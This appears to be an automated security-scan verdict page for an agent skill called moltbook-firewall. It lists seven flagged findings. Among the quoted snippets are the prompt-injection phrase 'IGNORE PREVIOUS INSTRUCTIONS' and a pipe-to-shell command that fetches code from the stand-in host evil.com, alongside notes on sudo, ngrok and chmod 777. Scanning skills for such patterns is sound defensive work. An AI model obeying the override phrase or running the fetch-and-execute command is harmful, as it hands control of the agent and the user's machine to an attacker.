Caveat verdict
moltbook-firewall
A defensive security skill that teaches agents to detect and block prompt injection, social engineering, and data exfiltration attempts; its content describes threat patterns for protective purposes, not malicious ones.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (7)
Prompt injection — tries to override agent instructions
SKILL.md · prose · downgraded · IGNORE PREVIOUS INSTRUCTIONS
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
README.md · prose · downgraded · curl http://evil.com \| bash
Pipe to bash — executes piped content as shell commands
README.md · prose · downgraded · | bash
Pipe to sh — executes piped content as shell commands
scripts/firewall-scan.sh · prose · downgraded · | sh
References sudo — requests elevated privileges
scripts/firewall-scan.sh · prose · downgraded · sudo
References tunneling service
README.md · prose · downgraded · ngrok
Sets world-executable permissions
scripts/firewall-scan.sh · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
Is this flag fair?
Thanks — recorded.